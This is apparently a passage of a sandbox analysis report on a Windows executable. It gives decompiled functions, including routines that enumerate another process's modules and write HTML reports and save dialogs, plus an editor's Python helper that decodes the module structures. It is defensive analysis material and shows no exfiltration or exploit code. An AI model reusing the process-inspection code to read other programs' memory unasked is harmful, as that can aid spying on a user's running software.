                                                                                                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                                                                                  • String ID: caption$dialog_%d
                                                                                                                                                                  • API String ID: 246480800-4161923789
                                                                                                                                                                  • Opcode ID: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                  • Instruction ID: c346797357670b32f643cbd36cfbc212eb539bb93902627947de0ac2d0f12ab5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                  • Instruction Fuzzy Hash: DBF0BB3058424D7EDB129750DD06FD97A68AB18746F0400EAFB44E10D1DBF8AAD0875E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 35%
			// Decompiler output, left as emitted. The comments are an editor's reading of the
			// listing: the indirect calls through 0x417fxx are unresolved imports, and the API
			// names attached to them are inferred from argument patterns and structure sizes
			// (8 = TH32CS_SNAPMODULE, 0x224 = sizeof(MODULEENTRY32), 0xc = sizeof(MODULEINFO),
			// 0x410 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), not resolved on the page.
			// _a4 is a process id; _a8 is an opaque argument for the per-module callback E0040EAD0.
			E0040E8C6(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E00412360(0x446c, __ecx);                 // stack probe for the 0x446c-byte frame
				_t102 = 0;
				_v20 = 0;                                 // return value: 1 once a module list was obtained
				if(E004062A6() == 0 ||  *0x418518 == 0) { // run-time selection of the enumeration method
					// Fallback: Toolhelp32 module snapshot
					if( *0x418514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x417fe0(8, _t94);        // (TH32CS_SNAPMODULE, pid): CreateToolhelp32Snapshot pattern
						_v8 = _t63;
						if(_t63 != 0xffffffff) {          // INVALID_HANDLE_VALUE
							_v20 = 1;
							_v1132 = 0x224;               // MODULEENTRY32.dwSize (548 bytes, ANSI, 32-bit)
							_t64 =  *0x417fd8(_t63,  &_v1132);   // Module32First pattern
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);   // 0x118-byte record handed to the callback
								_v312 = _v1104;                  // MODULEENTRY32.hModule
								_v316 = _t94;                    // process id
								strcpy( &_v308,  &_v844);        // MODULEENTRY32.szExePath
								_v44 = _v1108;                   // MODULEENTRY32.modBaseSize
								_t107 = _t107 + 0x14;
								_v40 = _v1112;                   // MODULEENTRY32.modBaseAddr
								_v1132 = 0x224;
								if(E0040EAD0(_a8,  &_v316) != 0) {   // callback returns 0 to stop enumeration
									_t64 =  *0x417fd4(_v8,  &_v1132);   // Module32Next pattern
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					// Primary: PSAPI-style enumeration of the remote module list
					_t77 = OpenProcess(0x410, 0, _a4);    // PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);                    // lpcbNeeded
						_push(0x4000);                    // cb: room for 0x1000 module handles
						_push( &_v17516);                 // lphModule array
						_push(_t77);                      // hProcess
						if( *0x417fe4() != 0) {           // EnumProcessModules pattern
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;            // bytes returned -> module count
							_v20 = 1;
							_v12 = 0;                     // index into the handle array
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);  // MAX_PATH path buffer
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));   // lphModule[_v12]
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x417fdc(_v8, _t84,  &_v580, 0x104);   // GetModuleFileNameExA pattern
									E0040E7E3( &_v308,  &_v580);            // path buffer -> record path field
									_push(0xc);                             // cb = sizeof(MODULEINFO)
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x417fe8() != 0) {                 // GetModuleInformation pattern
										_v44 = _v28;                        // MODULEINFO.SizeOfImage
										_v40 = _v32;                        // MODULEINFO.lpBaseOfDll
									}
									if(E0040EAD0(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
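Both branches of E0040E8C6 end up filling the same 0x118-byte per-module record (process id, module handle, image path, image size, image base) before calling E0040EAD0, once from a MODULEENTRY32 and once from a GetModuleFileNameExA path plus a MODULEINFO. The following is an added example by the editor, not code from the sandbox report or from the sample: it decodes the two structure layouts the constants in the listing imply (0x224 and 0xc bytes) and rebuilds that record from either source, which is how an analyst confirms the API identification from the structure sizes alone. The API names are inferred from argument patterns, the record offsets are read off the stack layout above, and the module entry fed in is constructed, not captured from the sample.

```python
import struct

# Constants taken from the decompiled listing of E0040E8C6. The Windows API
# names attached to them are inferred from argument patterns and structure
# sizes (the report does not resolve the indirect calls), not read from the page.
TH32CS_SNAPMODULE = 0x8            # first argument of the snapshot call
PROCESS_QUERY_VM_READ = 0x410      # OpenProcess access mask (QUERY_INFORMATION | VM_READ)
MODULEENTRY32_SIZE = 0x224         # dwSize stored in _v1132
MODULEINFO_SIZE = 0xc              # cb argument of the module-information call
MAX_PATH = 0x104                   # path buffer length
RECORD_SIZE = 0x118                # memset length of the record passed to E0040EAD0

# MODULEENTRY32 (32-bit, ANSI): dwSize, th32ModuleID, th32ProcessID, GlblcntUsage,
# ProccntUsage, modBaseAddr, modBaseSize, hModule, szModule[256], szExePath[260]
_ME32 = struct.Struct("<8I256s260s")
# MODULEINFO: lpBaseOfDll, SizeOfImage, EntryPoint
_MI = struct.Struct("<3I")
# Record built by E0040E8C6, from its stack offsets: pid @0, hModule @4,
# path @8 (264 bytes up to 0x110), size @0x110, base @0x114
_REC = struct.Struct("<II264sII")
assert (_ME32.size, _MI.size, _REC.size) == (MODULEENTRY32_SIZE, MODULEINFO_SIZE, RECORD_SIZE)


def _cstr(raw: bytes) -> str:
    """NUL-terminated ANSI string from a fixed-size field."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def parse_moduleentry32(buf: bytes) -> dict:
    """Decode a MODULEENTRY32 buffer as Module32First/Next would fill it."""
    if len(buf) != MODULEENTRY32_SIZE:
        raise ValueError(f"expected {MODULEENTRY32_SIZE:#x} bytes, got {len(buf):#x}")
    (size, _mod_id, pid, _glbl, _proc, base, base_size, hmod,
     sz_module, sz_exe_path) = _ME32.unpack(buf)
    if size != MODULEENTRY32_SIZE:
        raise ValueError(f"dwSize {size:#x} is not sizeof(MODULEENTRY32)")
    return {"pid": pid, "base": base, "size": base_size, "hmodule": hmod,
            "module": _cstr(sz_module), "path": _cstr(sz_exe_path)}


def parse_moduleinfo(buf: bytes) -> dict:
    """Decode a MODULEINFO buffer (the 12 bytes written into _v32)."""
    if len(buf) != MODULEINFO_SIZE:
        raise ValueError(f"expected {MODULEINFO_SIZE:#x} bytes, got {len(buf):#x}")
    base, size, entry = _MI.unpack(buf)
    return {"base": base, "size": size, "entry": entry}


def build_record(pid: int, hmodule: int, path: str, size: int, base: int) -> bytes:
    """Lay out the 0x118-byte per-module record the function hands to its callback."""
    path_b = path.encode("latin-1")
    if len(path_b) >= MAX_PATH:          # the strcpy source is a 260-byte field
        raise ValueError("path does not fit a MAX_PATH buffer")
    return _REC.pack(pid, hmodule, path_b, size, base)


def record_from_toolhelp(entry: bytes) -> bytes:
    """Toolhelp branch: hModule, szExePath, modBaseSize, modBaseAddr -> record."""
    m = parse_moduleentry32(entry)
    return build_record(m["pid"], m["hmodule"], m["path"], m["size"], m["base"])


def record_from_psapi(pid: int, hmodule: int, path: str, moduleinfo: bytes) -> bytes:
    """PSAPI branch: GetModuleFileNameExA path plus MODULEINFO -> the same record."""
    mi = parse_moduleinfo(moduleinfo)
    return build_record(pid, hmodule, path, mi["size"], mi["base"])


def sample_entry() -> bytes:
    """Constructed MODULEENTRY32 for a fictitious module (not data from the sample)."""
    return _ME32.pack(MODULEENTRY32_SIZE, 1, 0x1234, 1, 1, 0x00400000, 0x19000,
                      0x00400000, b"example.dll", b"C:\\example\\example.dll")


if __name__ == "__main__":
    print(parse_moduleentry32(sample_entry()))
    print(record_from_toolhelp(sample_entry()).hex())
```

The size checks are the point: a buffer of any other length, or a dwSize that does not equal 0x224, would mean the call was not Module32First/Next on a 32-bit ANSI MODULEENTRY32, and the identification above would have to be revisited.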
Instruction addresses (listing order): 0x0040e8ce, 0x0040e8d6, 0x0040e8d8, 0x0040e8e2, 0x0040ea06, 0x0040ea0c, 0x0040ea12, 0x0040ea1b, 0x0040ea1e, 0x0040ea31, 0x0040ea38, 0x0040ea3e, 0x0040eabb, 0x0040ea53, 0x0040ea5e, 0x0040ea72, 0x0040ea78, 0x0040ea83, 0x0040ea8c, 0x0040ea8f, 0x0040ea9c, 0x0040eaa9, 0x0040eab5, 0x00000000, 0x0040eab5, 0x00000000, 0x0040eaa9, 0x00000000, 0x0040eabb, 0x0040ea1e, 0x0040e8f4, 0x0040e8fd, 0x0040e905, 0x0040e908, 0x0040e911, 0x0040e912, 0x0040e91d, 0x0040e91e, 0x0040e927, 0x0040e92d, 0x0040e92d, 0x0040e931, 0x0040e938, 0x0040e93b, 0x0040e94a, 0x0040e953, 0x0040e95a, 0x0040e96c, 0x0040e977, 0x0040e97e, 0x0040e982, 0x0040e993, 0x0040e999, 0x0040e9ab, 0x0040e9b0
                                                                                                                                                                  0x0040e9b5
                                                                                                                                                                  0x0040e9b6
                                                                                                                                                                  0x0040e9bc
                                                                                                                                                                  0x0040e9c7
                                                                                                                                                                  0x0040e9cc
                                                                                                                                                                  0x0040e9d2
                                                                                                                                                                  0x0040e9d2
                                                                                                                                                                  0x0040e9e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e9ec
                                                                                                                                                                  0x0040e9f5
                                                                                                                                                                  0x0040e948
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e9fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e9f5
                                                                                                                                                                  0x0040e94a
                                                                                                                                                                  0x0040e93b
                                                                                                                                                                  0x0040eabf
                                                                                                                                                                  0x0040eac2
                                                                                                                                                                  0x0040eac2
                                                                                                                                                                  0x0040e908
                                                                                                                                                                  0x0040eacf

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040E3BD,00000000,00000000), ref: 0040E8FD
                                                                                                                                                                  • memset.MSVCRT ref: 0040E95A
                                                                                                                                                                  • memset.MSVCRT ref: 0040E96C
                                                                                                                                                                    • Part of subcall function 0040E7E3: strcpy.MSVCRT(?,-00000001), ref: 0040E809
                                                                                                                                                                  • memset.MSVCRT ref: 0040EA53
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040EA78
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0040E3BD,?), ref: 0040EAC2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3799309942-0
                                                                                                                                                                  • Opcode ID: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                  • Instruction ID: 2a82ac7989168376751b009825c1859dcdea9a7a89aff0dc4cc4404167d83f81
                                                                                                                                                                  • Opcode Fuzzy Hash: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 79512EB1A00218AFDB10DF95CD85ADEBBB8FB48304F1445AAF505A2281DB749F90CF69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                                  			E004094DC(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char* _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				char _v68;
                                                                                                                                                                  				void _v96;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				signed int _t51;
                                                                                                                                                                  				char* _t53;
                                                                                                                                                                  				char* _t63;
                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				char _t84;
                                                                                                                                                                  				intOrPtr* _t91;
                                                                                                                                                                  				signed int _t95;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  
                                                                                                                                                                  				_t69 = __ebx;
                                                                                                                                                                  				_t70 = 6;
                                                                                                                                                                  				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
                                                                                                                                                                  				_t97 = _t96 + 0xc;
                                                                                                                                                                  				asm("movsw");
                                                                                                                                                                  				asm("movsd");
                                                                                                                                                                  				asm("movsd");
                                                                                                                                                                  				asm("movsd");
                                                                                                                                                                  				asm("movsd");
                                                                                                                                                                  				asm("movsw");
                                                                                                                                                                  				asm("movsb");
                                                                                                                                                                  				E00405F07(_a4, "<tr>");
                                                                                                                                                                  				_t95 = 0;
                                                                                                                                                                  				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
                                                                                                                                                                  						_v8 = _t51;
                                                                                                                                                                  						_t53 =  &_v96;
                                                                                                                                                                  						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
                                                                                                                                                                  							_t53 =  &_v48;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t91 = _a8;
                                                                                                                                                                  						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                  						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                  						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                  						_v16 = _v16 & 0x00000000;
                                                                                                                                                                  						_v12 = _t53;
                                                                                                                                                                  						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
                                                                                                                                                                  						E0040F6E2(_v28,  &_v68);
                                                                                                                                                                  						E0040F70E( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
                                                                                                                                                                  						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
                                                                                                                                                                  						_t63 =  *(_t69 + 0x50);
                                                                                                                                                                  						_t84 =  *_t63;
                                                                                                                                                                  						if(_t84 == 0 || _t84 == 0x20) {
                                                                                                                                                                  							strcat(_t63, "&nbsp;");
                                                                                                                                                                  						}
                                                                                                                                                                  						E0040F797( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
                                                                                                                                                                  						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
                                                                                                                                                                  						E00405F07(_a4,  *(_t69 + 0x4c));
                                                                                                                                                                  						_t97 = _t97 + 0x20;
                                                                                                                                                                  						_t95 = _t95 + 1;
                                                                                                                                                                  					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
                                                                                                                                                                  				}
                                                                                                                                                                  				return E00405F07(_a4, 0x413b1c);
                                                                                                                                                                  			}

APIs
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
• strcat.MSVCRT(?,&nbsp;), ref: 004095A1
• sprintf.MSVCRT ref: 004095C3
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FileWritesprintfstrcatstrlen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 3813295786-4153097237
• Opcode ID: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
• Instruction ID: d2e4fb28aa3b1966a3fc448ecfbbe776d9831430555dea6067297da34f065eca
• Opcode Fuzzy Hash: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
• Instruction Fuzzy Hash: 4F318F32900209AFDF15DF95C8869DE7BB5FF44314F1041AAFD10AB1E2D776A951CB84
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
			E00411133(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E00412360(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L00412090();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E004104AE( &_v5796, _t80);
				_v5796 = 0x41553c;
				E00410B65( &_v3636);
				E00410B65( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0041061F(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E0041072A(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060DA(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L00412096();
				return E00410596( &_v5796);
			}

APIs
• wcslen.MSVCRT ref: 00411146
• ??2@YAPAXI@Z.MSVCRT ref: 0041114F
• WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
  • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104C3
  • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104E1
  • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104FC
  • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410525
  • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410549
• strlen.MSVCRT ref: 004111AB
  • Part of subcall function 0041061F: ??3@YAXPAX@Z.MSVCRT ref: 0041062A
  • Part of subcall function 0041061F: ??2@YAPAXI@Z.MSVCRT ref: 00410639
• memcpy.MSVCRT ref: 004111C5
• ??3@YAXPAX@Z.MSVCRT ref: 00411258
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
• Opcode ID: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
• Instruction ID: 068040a7654b3252a10ead66c722fc8ae16d1693d490f738ed846916017eff7d
• Opcode Fuzzy Hash: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
• Instruction Fuzzy Hash: 21314472D04219ABCF21EF65C8809DDBBB5AF49314F0481AAE608A3251CB396FD5CF59
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040AC6E(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				char* _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				char* _v44;
                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				void _v1095;
                                                                                                                                                                  				char _v1096;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				char _t29;
                                                                                                                                                                  				intOrPtr _t32;
                                                                                                                                                                  				intOrPtr _t35;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				char _t59;
                                                                                                                                                                  				char* _t60;
                                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                                  
                                                                                                                                                                  				_v1096 = 0;
                                                                                                                                                                  				memset( &_v1095, 0, 0x3ff);
                                                                                                                                                                  				_v8 = 0x747874;
                                                                                                                                                                  				_t29 = E00407A69(0x1f5);
                                                                                                                                                                  				_t59 = "*.txt";
                                                                                                                                                                  				_v72 = _t29;
                                                                                                                                                                  				_v68 = _t59;
                                                                                                                                                                  				_v64 = E00407A69(0x1f6);
                                                                                                                                                                  				_v60 = _t59;
                                                                                                                                                                  				_v56 = E00407A69(0x1f7);
                                                                                                                                                                  				_v52 = _t59;
                                                                                                                                                                  				_t32 = E00407A69(0x1f8);
                                                                                                                                                                  				_t60 = "*.htm;*.html";
                                                                                                                                                                  				_v48 = _t32;
                                                                                                                                                                  				_v44 = _t60;
                                                                                                                                                                  				_v40 = E00407A69(0x1f9);
                                                                                                                                                                  				_v36 = _t60;
                                                                                                                                                                  				_v32 = E00407A69(0x1fa);
                                                                                                                                                                  				_v28 = "*.xml";
                                                                                                                                                                  				_t35 = E00407A69(0x1fb);
                                                                                                                                                                  				_t61 = "*.csv";
                                                                                                                                                                  				_v24 = _t35;
                                                                                                                                                                  				_v20 = _t61;
                                                                                                                                                                  				_v16 = E00407A69(0x1fc);
                                                                                                                                                                  				_v12 = _t61;
                                                                                                                                                                  				E0040687C( &_v1096,  &_v72, 8);
                                                                                                                                                                  				_t52 = 7;
                                                                                                                                                                  				_t39 = E00407A69(_t52);
                                                                                                                                                                  				_t23 =  &_v8; // 0x747874
                                                                                                                                                                  				return E004066AF(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                                                                                                                                                  			}
                                                                                                                                                                  0x0040ac87
                                                                                                                                                                  0x0040ac8e
                                                                                                                                                                  0x0040ac9b
                                                                                                                                                                  0x0040aca2
                                                                                                                                                                  0x0040aca7
                                                                                                                                                                  0x0040acad
                                                                                                                                                                  0x0040acb0
                                                                                                                                                                  0x0040acbd
                                                                                                                                                                  0x0040acc0
                                                                                                                                                                  0x0040acc9
                                                                                                                                                                  0x0040accc
                                                                                                                                                                  0x0040accf
                                                                                                                                                                  0x0040acd4
                                                                                                                                                                  0x0040acde
                                                                                                                                                                  0x0040ace1
                                                                                                                                                                  0x0040acea
                                                                                                                                                                  0x0040aced
                                                                                                                                                                  0x0040acfa
                                                                                                                                                                  0x0040acfd
                                                                                                                                                                  0x0040ad04
                                                                                                                                                                  0x0040ad09
                                                                                                                                                                  0x0040ad0f
                                                                                                                                                                  0x0040ad12
                                                                                                                                                                  0x0040ad1a
                                                                                                                                                                  0x0040ad29
                                                                                                                                                                  0x0040ad2c
                                                                                                                                                                  0x0040ad35
                                                                                                                                                                  0x0040ad36
                                                                                                                                                                  0x0040ad3e
                                                                                                                                                                  0x0040ad5e

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040AC8E
                                                                                                                                                                    • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                    • Part of subcall function 0040687C: memset.MSVCRT ref: 0040689C
                                                                                                                                                                    • Part of subcall function 0040687C: sprintf.MSVCRT ref: 004068C9
                                                                                                                                                                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068D5
                                                                                                                                                                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 004068EA
                                                                                                                                                                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068F8
                                                                                                                                                                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 00406908
                                                                                                                                                                    • Part of subcall function 004066AF: GetSaveFileNameA.COMDLG32(?), ref: 004066FE
                                                                                                                                                                    • Part of subcall function 004066AF: strcpy.MSVCRT(?,?), ref: 00406715
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                  • API String ID: 4021364944-3614832568
                                                                                                                                                                  • Opcode ID: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                  • Instruction ID: b1b2e5a0efe066de17158a8bc8fa7ff9efe1d0f31d50f94681ee96e1b845f603
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                  • Instruction Fuzzy Hash: B82101B1E042199ED700EFE6D8817DEBBB4AB08704F10417FE509B7282D7382B458F5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                  			E00403A67(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				void _v8199;
                                                                                                                                                                  				char _v8200;
                                                                                                                                                                  				void _v24582;
                                                                                                                                                                  				short _v24584;
                                                                                                                                                                  
                                                                                                                                                                  				E00412360(0x6004, __ecx);
                                                                                                                                                                  				_v24584 = 0;
                                                                                                                                                                  				memset( &_v24582, 0, 0x3ffe);
                                                                                                                                                                  				_v8200 = 0;
                                                                                                                                                                  				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                                  				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                                                                                                                                  				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                                  				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                                  			}
                                                                                                                                                                  0x00403a6f
                                                                                                                                                                  0x00403a85
                                                                                                                                                                  0x00403a8c
                                                                                                                                                                  0x00403a9f
                                                                                                                                                                  0x00403aa5
                                                                                                                                                                  0x00403abc
                                                                                                                                                                  0x00403adb
                                                                                                                                                                  0x00403b07

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00403A8C
                                                                                                                                                                  • memset.MSVCRT ref: 00403AA5
